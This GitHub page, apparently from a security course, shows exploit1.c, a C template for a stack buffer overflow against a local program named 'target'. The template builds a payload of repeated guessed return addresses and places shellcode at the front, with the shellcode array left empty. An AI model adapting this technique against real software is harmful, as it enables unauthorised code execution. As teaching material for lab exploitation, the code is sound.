-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit1.c
51 lines (36 loc) · 1.21 KB
/
exploit1.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <assert.h>
#include <unistd.h>
// put the shellcode here in binary form: "\xAA\xBB..."
char shellcode[] = "";
unsigned long get_esp(void) { __asm__("movl %esp,%eax"); }
void main(int argc, char* argv[]) {
assert(argc == 2);
int payload_size = 150; // size of our long payload
int offset = atoi(argv[1]); // offset to our ESP
char* payload = malloc(payload_size);
long addr = get_esp() - offset;
fprintf(stderr, "Using address: 0x%lx\n", addr);
// write the address everywhere
for (int i = 0; i < payload_size/4; i++)
((long*)payload)[i] = addr;
// the shellcode at the beginning
for (int i = 0; i < strlen(shellcode); i++)
payload[i] = shellcode[i];
// 0 only at the very end
payload[payload_size - 1] = '\0';
//////////////////////////
// run target with payload as argument
char* target_argv[] = { "./target", payload, NULL };
execv(target_argv[0], target_argv);
// For debugging, it's also useful to write the payload to a file
// and run target with payload as argument using xargs.
//
// FILE *f = fopen("/tmp/payload", "w");
// fprintf(f, "%s", payload);
// fclose(f);
//
// system("xargs -0 -a /tmp/payload ./target");
}